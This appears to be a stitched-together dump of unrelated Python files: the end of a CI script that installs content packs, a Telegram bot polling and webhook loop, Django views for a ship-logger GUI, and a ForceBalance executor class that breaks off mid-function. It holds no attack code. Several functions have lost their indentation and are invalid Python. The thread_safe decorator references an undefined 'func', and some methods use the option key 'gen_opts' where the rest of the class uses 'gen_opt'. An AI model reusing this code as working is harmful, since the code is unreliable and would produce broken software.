    if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
        return False
    if build.is_nightly:
        install_nightly_pack(build)
        return True
    if build.is_private:
        return True
    return install_packs(build, pack_ids=get_non_added_packs_ids(build))
def main():
    """Entry point: configure servers, install packs, configure integration
    instances, run the pre/post-update "Test"-button checks, and exit with
    status 2 on any failure."""
    install_logging('Install_Content_And_Configure_Integrations_On_Server.log')
    build = Build(options_handler())
    configure_servers_and_restart(build)
    # Clear instances left over from previous runs before installing packs.
    disable_instances(build)
    installed_content_packs_successfully = install_packs_pre_update(build)
    new_integrations, modified_integrations = get_changed_integrations(build)
    pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
                                                                                  new_integrations,
                                                                                  modified_integrations)
    modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
    # Overall pack status requires both the pre-update install and the update to succeed.
    installed_content_packs_successfully = update_content_on_servers(build) and installed_content_packs_successfully
    successful_tests_post, failed_tests_post = test_integrations_post_update(build,
                                                                             new_module_instances,
                                                                             modified_module_instances)
    success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
                                  new_integrations)
    if not success or not installed_content_packs_successfully:
        # Non-zero exit fails the CI step.
        sys.exit(2)
# Script entry point: run the full configure-and-test flow.
if __name__ == '__main__':
    main()
|
loop.py | import sys
import time
import json
import threading
import traceback
import collections
try:
import Queue as queue
except ImportError:
import queue
from . import exception
from . import _find_first_key, flavor_router
class RunForeverAsThread(object):
    """Mixin that runs `self.run_forever` on a daemon background thread."""
    def run_as_thread(self, *args, **kwargs):
        """Start run_forever(*args, **kwargs) on a daemon thread and return immediately."""
        worker = threading.Thread(target=self.run_forever, args=args, kwargs=kwargs)
        worker.daemon = True
        worker.start()
class CollectLoop(RunForeverAsThread):
    """Pulls messages off an input queue forever, feeding each to a handler."""
    def __init__(self, handle):
        self._handle = handle
        self._inqueue = queue.Queue()

    @property
    def input_queue(self):
        """The queue that feeds this loop."""
        return self._inqueue

    def run_forever(self):
        # Block on the queue; handler errors are printed and the loop continues.
        while 1:
            try:
                self._handle(self._inqueue.get(block=True))
            except:
                traceback.print_exc()
class GetUpdatesLoop(RunForeverAsThread):
    """Long-polls the bot's getUpdates endpoint forever, passing each update
    to the supplied callback."""
    def __init__(self, bot, on_update):
        self._bot = bot
        self._update_handler = on_update

    def run_forever(self, relax=0.1, offset=None, timeout=20, allowed_updates=None):
        """
        Process new updates in infinity loop
        :param relax: float - seconds to sleep between polls
        :param offset: int - initial update offset
        :param timeout: int - long-poll timeout passed to getUpdates
        :param allowed_updates: bool - update types to receive (sent once)
        """
        while 1:
            try:
                result = self._bot.getUpdates(offset=offset,
                                              timeout=timeout,
                                              allowed_updates=allowed_updates)
                # Once passed, this parameter is no longer needed.
                allowed_updates = None
                # No sort. Trust server to give messages in correct order.
                for update in result:
                    self._update_handler(update)
                    offset = update['update_id'] + 1
            except exception.BadHTTPResponse as e:
                traceback.print_exc()
                # Servers probably down. Wait longer.
                if e.status == 502:
                    time.sleep(30)
            except Exception:
                # BUGFIX: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit and made the loop impossible
                # to terminate; only ordinary errors are tolerated now.
                traceback.print_exc()
            finally:
                time.sleep(relax)
def _dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def _dictify27(data):
    """Coerce a JSON payload (str/unicode/dict) to a dict (Python 2.7 only).

    NOTE: relies on the Python 2 `unicode` builtin and must never be called
    on Python 3; the interpreter-appropriate variant is selected at import
    time via the `_dictify` alias defined after these functions.
    """
    if type(data) in [str, unicode]:
        return json.loads(data)
    elif type(data) is dict:
        return data
    else:
        raise ValueError()
# Pick the JSON-coercion helper matching the running interpreter.
_dictify = _dictify3 if sys.version_info >= (3,) else _dictify27
def _extract_message(update):
    """Return (flavor_key, payload) for the first recognized flavor key
    present in a Telegram Update object."""
    flavors = ['message',
               'edited_message',
               'channel_post',
               'edited_channel_post',
               'callback_query',
               'inline_query',
               'chosen_inline_result',
               'shipping_query',
               'pre_checkout_query',
               'poll',
               'poll_answer',
               'my_chat_member',
               'chat_member']
    key = _find_first_key(update, flavors)
    return key, update[key]
def _infer_handler_function(bot, h):
if h is None:
return bot.handle
elif isinstance(h, dict):
return flavor_router(h)
else:
return h
class MessageLoop(RunForeverAsThread):
    """Polls Telegram for updates and dispatches each message to a handler."""
    def __init__(self, bot, handle=None):
        self._bot = bot
        self._handle = _infer_handler_function(bot, handle)

    def run_forever(self, *args, **kwargs):
        """
        Poll for updates and dispatch messages until interrupted.

        :type relax: float
        :param relax: seconds between each :meth:`.getUpdates`
        :type offset: int
        :param offset: initial ``offset`` parameter supplied to :meth:`.getUpdates`
        :type timeout: int
        :param timeout:
            ``timeout`` parameter supplied to :meth:`.getUpdates`, controlling
            how long to poll.
        :type allowed_updates: array of string
        :param allowed_updates:
            ``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
            controlling which types of updates to receive.
        Calling this method will block forever. Use :meth:`.run_as_thread` to
        run it non-blockingly.
        """
        collector = CollectLoop(self._handle)
        # Polled updates and scheduler events both feed the collect loop.
        poller = GetUpdatesLoop(self._bot,
                                lambda update:
                                    collector.input_queue.put(_extract_message(update)[1]))
        self._bot.scheduler.on_event(collector.input_queue.put)
        self._bot.scheduler.run_as_thread()
        poller.run_as_thread(*args, **kwargs)
        collector.run_forever()  # blocking
class Webhook(RunForeverAsThread):
    """Feeds externally-received webhook payloads into a collect loop."""
    def __init__(self, bot, handle=None):
        self._bot = bot
        self._collectloop = CollectLoop(_infer_handler_function(bot, handle))

    def run_forever(self):
        # Scheduler events share the collect loop's queue with webhook messages.
        self._bot.scheduler.on_event(self._collectloop.input_queue.put)
        self._bot.scheduler.run_as_thread()
        self._collectloop.run_forever()

    def feed(self, data):
        """Accept a raw update (str/bytes/dict) and queue its message payload."""
        payload = _extract_message(_dictify(data))[1]
        self._collectloop.input_queue.put(payload)
class Orderer(RunForeverAsThread):
    """Re-orders incoming updates by ``update_id`` before delivering them.

    Updates that arrive out of order are buffered until the missing smaller
    ids arrive or a hold timeout (``maxhold``) expires.
    """
    def __init__(self, on_ordered_update):
        # Callback invoked with each update, strictly in update_id order.
        self._on_ordered_update = on_ordered_update
        self._inqueue = queue.Queue()

    @property
    def input_queue(self):
        """Queue into which raw (possibly out-of-order) updates are fed."""
        return self._inqueue

    def run_forever(self, maxhold=3):
        """Consume the input queue forever, delivering updates in order.

        :param maxhold: max seconds to hold an update while waiting for a
            missing smaller ``update_id`` before giving up on it.
        """
        def handle(update):
            self._on_ordered_update(update)
            return update['update_id']

        # Here is the re-ordering mechanism, ensuring in-order delivery of updates.
        max_id = None                 # max update_id passed to callback
        buffer = collections.deque()  # keep those updates which skip some update_id
        qwait = None                  # how long to wait for updates,
                                      # because buffer's content has to be returned in time.

        while 1:
            try:
                update = self._inqueue.get(block=True, timeout=qwait)

                if max_id is None:
                    # First message received, handle regardless.
                    max_id = handle(update)

                elif update['update_id'] == max_id + 1:
                    # No update_id skipped, handle naturally.
                    max_id = handle(update)

                    # clear contagious updates in buffer
                    if len(buffer) > 0:
                        buffer.popleft()  # first element belongs to update just received, useless now.
                        while 1:
                            try:
                                if type(buffer[0]) is dict:
                                    max_id = handle(buffer.popleft())  # updates that arrived earlier, handle them.
                                else:
                                    break  # gap, no more contagious updates
                            except IndexError:
                                break  # buffer empty

                elif update['update_id'] > max_id + 1:
                    # Update arrives pre-maturely, insert to buffer.
                    nbuf = len(buffer)
                    if update['update_id'] <= max_id + nbuf:
                        # buffer long enough, put update at position
                        buffer[update['update_id'] - max_id - 1] = update
                    else:
                        # buffer too short, lengthen it
                        expire = time.time() + maxhold
                        for a in range(nbuf, update['update_id']-max_id-1):
                            buffer.append(expire)  # put expiry time in gaps
                        buffer.append(update)

                else:
                    pass  # discard: update_id <= max_id was already delivered

            except queue.Empty:
                # debug message
                # print('Timeout')

                # some buffer contents have to be handled
                # flush buffer until a non-expired time is encountered
                while 1:
                    try:
                        if type(buffer[0]) is dict:
                            max_id = handle(buffer.popleft())
                        else:
                            expire = buffer[0]
                            if expire <= time.time():
                                # expired gap: skip the missing id and move on
                                max_id += 1
                                buffer.popleft()
                            else:
                                break  # non-expired
                    except IndexError:
                        break  # buffer empty

            except:
                traceback.print_exc()

            finally:
                try:
                    # don't wait longer than next expiry time
                    qwait = buffer[0] - time.time()
                    if qwait < 0:
                        qwait = 0
                except IndexError:
                    # buffer empty, can wait forever
                    qwait = None

                # debug message
                # print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
    """Like :class:`Webhook`, but re-orders updates by ``update_id`` before
    they reach the message handler."""
    def __init__(self, bot, handle=None):
        self._bot = bot
        self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
        # The orderer delivers updates in update_id order to the collect loop.
        self._orderer = Orderer(lambda update:
                                    self._collectloop.input_queue.put(_extract_message(update)[1]))

    def run_forever(self, *args, **kwargs):
        r"""
        :type maxhold: float
        :param maxhold:
            The maximum number of seconds an update is held while waiting for a
            not-yet-arrived smaller ``update_id``. Once that time is up, the
            update is delivered to the message-handling function even if some
            smaller ``update_id``\s have not arrived; should they arrive at
            some later time, they are discarded.

        Calling this method will block forever. Use :meth:`.run_as_thread` to
        run it non-blockingly.
        """
        # Scheduler events bypass the orderer and go straight to the collect loop.
        self._bot.scheduler.on_event(self._collectloop.input_queue.put)
        self._bot.scheduler.run_as_thread()
        self._orderer.run_as_thread(*args, **kwargs)
        self._collectloop.run_forever()

    def feed(self, data):
        """
        :param data:
            One of these:

            - ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
              representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
            - a ``dict`` representing an Update object.
        """
        self._orderer.input_queue.put(_dictify(data))
|
views.py | import json
import logging
import multiprocessing
import os
import sys
import threading
import time
from json import JSONDecodeError
from signal import SIGTERM, SIGINT
from django.shortcuts import render
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
sys.path.append('.')
from .models import Logger, LoggerConfig, LoggerConfigState
from .models import Mode, Cruise, CurrentCruise, CruiseState
from .models import LogMessage, ServerState
from server.logger_manager import LoggerManager
# Read in JSON with comments
from logger.utils.read_json import parse_json
from django_gui.settings import HOSTNAME, WEBSOCKET_SERVER
# Convenience dicts we pass to the server_message page to
# translate logging levels to names and colors.
# Numeric logging levels -> display names shown on the server_message page.
LOG_LEVELS = {
    0: 'ALL',
    10: 'DEBUG',
    20: 'INFO',
    30: 'WARNING',
    40: 'ERROR',
    50: 'CRITICAL'
}
# Row highlight colors per level; empty string means no highlighting.
LOG_LEVEL_COLORS = {
    0: '',
    10: '',
    20: '',
    30: '#FFFF99',  # WARNING
    40: '#FF9999',  # ERROR
    50: '#FF6666'   # CRITICAL
}
############################
# We're going to interact with the Django DB via its API class
from .django_server_api import DjangoServerAPI
# Singleton DjangoServerAPI handle, lazily created by the view functions.
api = None
def log_request(request, cmd):
    """Record an incoming request's POST parameters in the API message log
    (no-op until the global `api` handle has been created)."""
    global api
    if not api:
        return
    user = request.user
    host = request.get_host()
    # Summarize the POST body, leaving out the CSRF token.
    elements = ', '.join('%s:%s' % (k, v) for k, v in request.POST.items()
                         if k != 'csrfmiddlewaretoken')
    api.message_log(source='Django', user='(%s@%s)' % (user, host),
                    log_level=api.INFO, message='post: %s' % elements)
################################################################################
def index(request, cruise_id=None):
    """Home page - render logger states and cruise information.

    Without a cruise_id, render the cruise-selection page; otherwise handle
    any POST action (select/delete cruise, select mode) and render the logger
    status page for the chosen cruise.
    """
    global api
    # Lazily create the shared API handle on first request.
    if api is None:
        api = DjangoServerAPI()

    if not cruise_id:
        template_vars = {
            'websocket_server': WEBSOCKET_SERVER,
            'cruise_id': '',
            'cruise_list': api.get_cruises(),
            'errors': '',
        }
        return render(request, 'django_gui/index.html', template_vars)

    ############################
    # If we've gotten a POST request
    if request.method == 'POST':
        # First things first: log the request
        log_request(request, cruise_id + ' index')

        # Did we get a cruise selection?
        if request.POST.get('select_cruise', None):
            cruise_id = request.POST['select_cruise']
            logging.info('switching to cruise "%s"', cruise_id)

        # Are they deleting a cruise?(!)
        # NOTE(review): this `if` starts a new chain, so a POST carrying only
        # 'select_cruise' also falls through to the final `else` below and
        # logs "Unknown POST request" — confirm whether that is intended.
        if request.POST.get('delete_cruise', None):
            logging.info('deleting cruise "%s"', cruise_id)
            api.delete_cruise(request.POST['delete_cruise'])

        # Did we get a mode selection?
        elif request.POST.get('select_mode', None):
            new_mode_name = request.POST['select_mode']
            logging.info('switching to mode "%s"', new_mode_name)
            api.set_mode(cruise_id, new_mode_name)

        # Else unknown post
        else:
            logging.warning('Unknown POST request: %s', request.POST)

    # Now assemble the information needed to display the page.
    cruise_list = api.get_cruises()
    modes = api.get_modes(cruise_id)
    current_mode = api.get_mode(cruise_id)

    # Get config corresponding to current mode for each logger
    loggers = {}
    for logger_id in api.get_loggers(cruise_id):
        logger_config = api.get_logger_config_name(cruise_id, logger_id)
        loggers[logger_id] = logger_config
        logging.warning('config for %s is %s', logger_id, logger_config)

    template_vars = {
        'is_superuser': True,
        'websocket_server': WEBSOCKET_SERVER,
        'cruise_id': cruise_id,
        'cruise_list': cruise_list,
        'modes': modes,
        'current_mode': current_mode,
        'loggers': loggers,
        #'status_server_running': get_server_state('StatusServer').running,
        #'logger_server_running': get_server_state('LoggerServer').running,
        'errors': '',
    }
    return render(request, 'django_gui/index.html', template_vars)
################################################################################
# Handles to the (not-yet-working) server-runner machinery; see servers().
run_servers_object = None
run_servers_process = None
################################################################################
# To start/stop/monitor servers
# NOTE: Starting/stopping the ServerRunner process (django_gui/run_servers.py)
# is not yet working. You'll need to start/stop it manually for now.
def servers(request):
    """Render the server-control page; handle start/stop POSTs.

    NOTE: actual process start/stop is stubbed out (see the commented-out
    ServerRunner lines); only the database flags and logging happen today.
    """
    global run_servers_object, run_servers_process

    # If we've gotten a POST request, check for new desired_state
    if request.method == 'POST':
        if request.POST.get('start', None):
            # Start the run_servers process
            logging.warning('Starting servers')
            if run_servers_object:
                logging.warning('Killing existing run_servers process')
                run_servers_object.quit()
            #run_servers_object = ServerRunner()
            #multiprocessing.set_start_method('spawn')
            #run_servers_process = \
            #    multiprocessing.Process(target=run_servers_object.start)
            #run_servers_process.start()

        if request.POST.get('stop', None):
            # Stop any run_servers process
            logging.warning('Stopping servers')
            if run_servers_object:
                # Flip the 'desired' flag in the DB; the servers are expected
                # to notice and shut themselves down.
                logging.warning('Asking StatusServer and LoggerServer to shut down')
                ServerState(server='StatusServer', running=True, desired=False).save()
                ServerState(server='LoggerServer', running=True, desired=False).save()
                time.sleep(1)
                logging.warning('Killing existing run_servers process')
                #run_servers_process.terminate()

    template_vars = {'websocket_server': WEBSOCKET_SERVER}

    # Render what we've ended up with
    return render(request, 'django_gui/servers.html', template_vars)
################################################################################
# Page to display messages from the specified server
def server_messages(request, log_level=logging.INFO, source=None):
    """Render a page that displays log messages from the specified source."""
    context = {
        'websocket_server': WEBSOCKET_SERVER,
        'log_level': log_level,
        'log_levels': LOG_LEVELS,
        'log_level_colors': LOG_LEVEL_COLORS,
        'source': source,
    }
    return render(request, 'django_gui/server_messages.html', context)
################################################################################
def edit_config(request, cruise_id, logger_id):
    """Render/handle the config-selection popup for a single logger."""
    global api
    if api is None:
        api = DjangoServerAPI()

    ############################
    # A POST means the user picked a new config: apply it and close the popup.
    if request.method == 'POST':
        # First things first: log the request
        log_request(request, '%s:%s edit_config' % (cruise_id, logger_id))

        selection = request.POST['select_config']
        logging.warning('selected config: %s', selection)
        api.set_logger_config_name(cruise_id, logger_id, selection)

        # Close window once we've done our processing
        return HttpResponse('<script>window.close()</script>')

    # Otherwise draw the selection form: the available configs, the active
    # one, and the default for the cruise's current mode.
    config_options = api.get_logger_config_names(cruise_id, logger_id)
    current_config = api.get_logger_config_name(cruise_id, logger_id)
    current_mode = api.get_mode(cruise_id)
    default_config = api.get_logger_config_name(cruise_id, logger_id,
                                                current_mode)
    context = {
        'cruise_id': cruise_id,
        'logger_id': logger_id,
        'current_config': current_config,
        'default_config': default_config,
        'config_options': config_options,
    }
    return render(request, 'django_gui/edit_config.html', context)
################################################################################
def load_cruise_config(request):
    """Upload page for a JSON cruise configuration file.

    GET renders the upload form; POST parses the uploaded file, loads it via
    the API, and closes the popup on success or re-renders with errors.
    """
    global api
    if api is None:
        api = DjangoServerAPI()

    # If not a POST, just draw the page
    if not request.method == 'POST':
        return render(request, 'django_gui/load_cruise_config.html', {})

    # If POST, we've expect there to be a file to process
    else:
        errors = []

        # Did we get a configuration file?
        if request.FILES.get('config_file', None):
            config_file = request.FILES['config_file']
            config_contents = config_file.read()
            logging.warning('Uploading file "%s"...', config_file.name)
            try:
                config = parse_json(config_contents.decode('utf-8'))
                api.load_cruise(config, config_file.name)
            # NOTE: JSONDecodeError is a subclass of ValueError; the second
            # handler catches other validation errors from load_cruise.
            except JSONDecodeError as e:
                errors.append(str(e))
            except ValueError as e:
                errors.append(str(e))

            # If no errors, close window - we're done.
            if not errors:
                return HttpResponse('<script>window.close()</script>')
        else:
            errors.append('No configuration file selected')

        # If here, there were errors
        return render(request, 'django_gui/load_cruise_config.html',
                      {'errors': ';'.join(errors)})
################################################################################
def widget(request, field_list=''):
    """Render a display widget for the comma-separated list of field names.

    FIX: removed 'global logger_server' -- the name was never used in this
    function.
    """
    template_vars = {
        'field_list': field_list,
        'is_superuser': True,
        'websocket_server': WEBSOCKET_SERVER,
    }
    # Render what we've ended up with
    return render(request, 'django_gui/widget.html', template_vars)
|
fb_executor.py | """
fb_executor module
This is built for interfacing with the ForceBalance command line interface.
"""
import os
import shutil
import subprocess
import time
import copy
import threading
import numpy as np
from forcebalance.nifty import lp_load
from forcebalance.parser import gen_opts_types, tgt_opts_types
from forcebalance.molecule import Molecule
class FBExecutor:
    """ Class designed for executing ForceBalance in command line.
    1. Check the files in an existing project folder, find the status.
    2. Execute ForceBalance program in a subprocess.
    3. Monitor the output and tmp files, send callback signals to FBProject.
    """
    # Allowed values for the status property.
    STATUS_SET = {'IDLE', 'RUNNING', 'FINISHED', 'ERROR'}

    @property
    def status(self):
        # Current executor state; always one of STATUS_SET.
        return self._status

    @status.setter
    def status(self, value):
        # Validate, store, then push a 'status_update' event to the observer.
        assert value in self.STATUS_SET, f'Invalid status value. Choices are: {self.STATUS_SET}'
        self._status = value
        self.notify_observer('status_update')
    def __init__(self, root_folder, interval=1, prefix='fb'):
        """Set up an executor rooted at *root_folder*.

        root_folder: project folder holding the input/output/tmp files.
        interval:    polling pause (seconds) used while monitoring the run.
        prefix:      basename for the ForceBalance input/output files.
        """
        self.root_folder = root_folder
        self.interval = interval
        self.prefix = prefix
        # observer callback installed via register_observer()
        self._observer = None
        # some file names
        self.checkpoint_fnm = 'checkpoint.p'
        self.input_file = os.path.join(self.root_folder, prefix+'.in')
        self.tmp_folder = os.path.join(self.root_folder, prefix+'.tmp')
        self.output_file = os.path.join(self.root_folder, prefix+'.out')
        self.result_folder = os.path.join(self.root_folder, 'result')
        # extra files removed by clean_up()
        self.files_to_clean = [os.path.join(self.root_folder, f) for f in [prefix+'.err', prefix+'.bak', prefix+'.sav', 'restart.p']]
        # input options, keyed 'gen_opt' / 'priors' / 'tgt_opts'
        self.input_options = {'gen_opt': {}, 'priors': {}, 'tgt_opts': {}}
        # try to load input file
        self.read_input_options()
        # self.read_tmp_folder()
        # read status from output file
        self.read_output_file()
        # store the status of work queue
        self._workqueue_status = {
            'worker_running': 0,
            'worker_total': 0,
            'job_finished': 0,
            'job_total': 0
        }
        # try to load self.obj_hist and self.mvals_hist from tmp folder
        # this is slow so we try to do it in thread
        # this should be done in the last step
        self.obj_hist = {}
        self.mvals_hist = {}
        # guards run/kill/clean_up (see the thread_safe decorator)
        self.lock = threading.Lock()
    def finish_loading_in_thread(self):
        """
        Finish loading tmp folder then notify project.
        This function runs in a separate thread.
        """
        def thread_func():
            # slow filesystem scan, then push both update events
            self.read_tmp_folder()
            self.notify_observer('iter_update')
            self.notify_observer('status_update')
        # NOTE(review): the lock is held only while *starting* the thread,
        # not while thread_func runs -- confirm this is the intended guard.
        with self.lock:
            thread = threading.Thread(target=thread_func)
            thread.start()
def thread_safe(self):
""" Decorator to make sure function runs with thread safety """
def new_func(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return new_func
def register_observer(self, observer):
""" register an observer function to handle events """
self._observer = observer
def notify_observer(self, msg):
""" Notify the observer by a message """
if self._observer is not None:
self._observer(msg)
    def read_input_options(self):
        """ Read input options from self.input_file

        Parses the ForceBalance input file into self.input_options with keys
        'gen_opt' ($options block), 'priors' (the priors sub-block) and
        'tgt_opts' (one dict per $target block, keyed by target name).
        No-op if the input file does not exist.
        """
        if not os.path.exists(self.input_file): return
        # aggregate the option types
        # (gen_opts_types / tgt_opts_types group option names by value type)
        gen_opt_type_mapping = {}
        for type_name, type_opts in gen_opts_types.items():
            for opt_name in type_opts:
                vtype = int if type_name == 'ints' else \
                    float if type_name == 'floats' else \
                    bool if type_name == 'bools' else \
                    str
                gen_opt_type_mapping[opt_name] = vtype
        tgt_opt_type_mapping = {}
        for type_name, type_opts in tgt_opts_types.items():
            for opt_name in type_opts:
                vtype = int if type_name == 'ints' else \
                    float if type_name == 'floats' else \
                    bool if type_name == 'bools' else \
                    str
                tgt_opt_type_mapping[opt_name] = vtype
        # start reading file
        with open(self.input_file) as f_in:
            reading_dest_name = None   # which block we are currently inside
            reading_dest = None        # the dict receiving parsed options
            tgt_opt_list = []
            for line in f_in:
                # strip trailing '#' comments and whitespace
                content = line.split('#', maxsplit=1)[0].strip()
                if content:
                    content_lower = content.lower()
                    if content_lower == '$options':
                        reading_dest_name = 'gen_opt'
                        reading_dest = self.input_options['gen_opt']
                    elif content_lower == 'priors':
                        reading_dest_name = 'priors'
                        reading_dest = self.input_options['priors']
                    elif content_lower == '/priors':
                        # priors are nested inside $options; fall back to it
                        reading_dest_name = 'gen_opt'
                        reading_dest = self.input_options['gen_opt']
                    elif content_lower == '$target':
                        reading_dest_name = 'tgt_opt'
                        reading_dest = {}
                        tgt_opt_list.append(reading_dest)
                    elif content_lower == '$end':
                        reading_dest_name = None
                        reading_dest = None
                    else:
                        ls = content.split()
                        key = ls[0]
                        if reading_dest_name == 'priors':
                            # prior lines look like "rule ... : value"
                            value = float(ls[-1])
                        else:
                            if reading_dest_name == 'gen_opt':
                                vtype = gen_opt_type_mapping[key]
                            elif reading_dest_name == 'tgt_opt':
                                vtype = tgt_opt_type_mapping[key]
                            else:
                                raise ValueError(f"Input line not in any block:\n{line}")
                            if len(ls) == 1:
                                # bare key means a boolean flag set to True
                                assert vtype == bool
                                value = True
                            elif len(ls) == 2:
                                if vtype == bool:
                                    value = not (ls[1].lower() in {'0', 'false', 'no', 'off'})
                                else:
                                    value = vtype(ls[1])
                            else:
                                # multiple values become a list of vtype
                                value = list(map(vtype, ls[1:]))
                        reading_dest[key] = value
        # insert all options from tgt_opt_list to self.input_options
        for tgt_opts in tgt_opt_list:
            name = tgt_opts.get('name')
            assert name, f"target name missing in {tgt_opts}"
            # ensure all targets has the weight option
            tgt_opts.setdefault('weight', 1.0)
            # ensure all target types are upper case
            tgt_opts['type'] = tgt_opts['type'].upper()
            self.input_options['tgt_opts'][name] = tgt_opts
        # ensure the gen_opt['jobtype'] is uppercase and OPTIMIZE instead of NEWTON
        jobtype = self.input_options['gen_opt']['jobtype'].upper()
        if jobtype == 'NEWTON':
            jobtype = "OPTIMIZE"
        self.input_options['gen_opt']['jobtype'] = jobtype
        # ensure penalty_type is uppercase
        penalty_type = self.input_options['gen_opt'].get('penalty_type')
        if penalty_type is not None:
            self.input_options['gen_opt']['penalty_type'] = penalty_type.upper()
        # ensure forcefield is in a list
        ff_fnms = self.input_options['gen_opt']['forcefield']
        if isinstance(ff_fnms, str):
            self.input_options['gen_opt']['forcefield'] = [ff_fnms]
        # check if normalize_weights is set, we don't support this yet
        if self.input_options['gen_opt'].get('normalize_weights') is True:
            raise ValueError("normalize_weights is not supported yet")
        # NOTE(review): debug print left in place
        print(self.input_options['gen_opt'])
def set_input_options(self, gen_opts, priors, tgt_opts):
self.input_options['gen_opts'].update(gen_opts)
self.input_options['priors'].update(priors)
self.input_options['tgt_opts'].update(tgt_opts)
def write_input_file(self):
""" Write self.input_options as an input file """
gen_opts = self.input_options['gen_opts'].copy()
# add a few fields to ensure checkpoint writing
gen_opts.update({
'writechk_step': True,
'writechk': self.checkpoint_fnm,
})
with open(self.input_file, 'w') as f:
f.write('$options\n')
# write general options
for key, value in gen_opts.items():
value_str = ' '.join(map(str, value)) if isinstance(value, (list, tuple)) else str(value)
f.write(f"{key:<30s} {value_str}\n")
# write the priors section
f.write('priors\n')
for rule, value in self.input_options['priors'].items():
f.write(f" {rule:<35s} : {value:.1e}\n")
f.write('/priors\n')
f.write('$end\n\n')
for tgt_opts in self.input_options['tgt_opts'].values():
# make a copy and set a high writelevel for details
tgt_opts = copy.deepcopy(tgt_opts)
tgt_opts['writelevel'] = 3
f.write('$target\n')
for key, value in tgt_opts.items():
value_str = ' '.join(map(str, value)) if isinstance(value, (list, tuple)) else str(value)
f.write(f"{key:<30s} {value_str}\n")
f.write('$end\n\n')
    def read_tmp_folder(self):
        """ Update self.obj_hist and self.mval_hist by reading tmp folder

        Scans each target's iter_NNNN folders, loading objective.p data into
        obj_hist[iter][target] and mvals.txt into mvals_hist[iter].
        """
        t0 = time.time()
        if not os.path.exists(self.tmp_folder):
            print(f"tmp folder {self.tmp_folder} not found")
            return
        # read information for each target
        target_names = self.input_options['tgt_opts'].keys()
        for target_name in target_names:
            tgt_folder_path = os.path.join(self.tmp_folder, target_name)
            for iter_folder in os.listdir(tgt_folder_path):
                iter_folder_path = os.path.join(tgt_folder_path, iter_folder)
                if os.path.isdir(iter_folder_path) and iter_folder.startswith('iter_'):
                    # folder names look like iter_0000, iter_0001, ...
                    opt_iter = int(iter_folder.split('_')[1])
                    # read objective.p
                    target_objective = self.load_target_objective(target_name, opt_iter)
                    if target_objective is not None:
                        # create obj_hist item if not exist
                        self.obj_hist.setdefault(opt_iter, {})
                        # put targets objective value, weight and gradients into obj_hist
                        self.obj_hist[opt_iter][target_name] = {
                            'x': target_objective['X'],
                            'w': float(self.input_options['tgt_opts'][target_name]['weight']),
                            'grad': target_objective['G'],
                        }
                        # load mval value into mval_hist if not exist
                        if opt_iter not in self.mvals_hist:
                            self.mvals_hist[opt_iter] = np.loadtxt(os.path.join(iter_folder_path, 'mvals.txt'))
        print(f"@@ read_tmp_folder {self.tmp_folder} finished ({time.time() - t0:.2f} s)")
def read_output_file(self):
""" Read output file to determine current status """
if os.path.exists(self.output_file):
with open(self.output_file) as fout:
lines = fout.readlines()
ending_content = '\n'.join(lines[-10:])
if "Calculation Finished." in ending_content:
self.status = 'FINISHED'
elif "I have not failed." in ending_content:
self.status = 'FINISHED'
self.not_converged = True
else:
self.status = 'ERROR'
else:
self.status = 'IDLE'
@thread_safe
def clean_up(self):
""" Remove ALL output and temporary files """
for f in [self.output_file, self.tmp_folder, self.result_folder] + self.files_to_clean:
if os.path.isfile(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
    @thread_safe
    def run(self):
        """ Start the ForceBalance run in subprocess """
        assert os.path.exists(self.input_file), f'ForceBalance input file {self.input_file} does not exist'
        self.status = "RUNNING"
        # stderr is merged into stdout so monitor() sees a single stream
        self.proc = subprocess.Popen(['ForceBalance', f'{self.prefix}.in'], cwd=self.root_folder, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        # reset histories; they are rebuilt as iterations complete
        self.obj_hist = {}
        self.mvals_hist = {}
        # NOTE(review): monitor() blocks until the run ends and runs while
        # self.lock is held, so kill() (also @thread_safe) would block until
        # then -- confirm this is intended.
        self.monitor()
def monitor(self):
if not hasattr(self, 'proc'): return
# check stdout and stderr pipes, send data to frontend
for line in self.proc.stdout:
line = line.decode()
if 'Writing the checkpoint file' in line:
self.get_iter_update()
elif "Calculation Finished." in line:
self.status = 'FINISHED'
elif "I have not failed." in line:
self.status = 'FINISHED'
self.not_converged = True
elif "error" in line:
self.status = 'ERROR'
elif "workers busy" in line and "jobs complete" in line:
self.update_workqueue_status(line)
if self.proc.poll() is None:
return
# repeat the monitor
time.sleep(self.interval)
self.monitor()
@thread_safe
def kill(self):
if not hasattr(self, 'proc'): return
self.proc.kill()
self.status = 'IDLE'
    def get_iter_update(self):
        """ Read the tmp folder during running, get updated information and trigger observer """
        # update self.obj_hist: the next iteration index is the current length
        opt_iter = len(self.obj_hist)
        self.obj_hist[opt_iter] = {}
        for target_name, tgt_options in self.input_options['tgt_opts'].items():
            target_objective = self.load_target_objective(target_name, opt_iter)
            self.obj_hist[opt_iter][target_name] = {
                'x': target_objective['X'],
                'w': float(tgt_options['weight']),
                'grad': target_objective['G'],
            }
        # update self.mvals_hist
        assert len(self.mvals_hist) == opt_iter, f'mvals_hist length {len(self.mvals_hist)} not consistent with obj_hist length {opt_iter}'
        # mvals.txt is read from the first target's folder (presumably the
        # same across targets -- TODO confirm)
        first_target_name = next(iter(self.input_options['tgt_opts']))
        self.mvals_hist[opt_iter] = np.loadtxt(os.path.join(self.tmp_folder, first_target_name, f'iter_{opt_iter:04d}', 'mvals.txt'))
        # trigger observer
        self.notify_observer('iter_update')
def load_target_objective(self, target_name, opt_iter):
folder = os.path.join(self.tmp_folder, target_name, f'iter_{opt_iter:04d}')
if not os.path.isdir(folder):
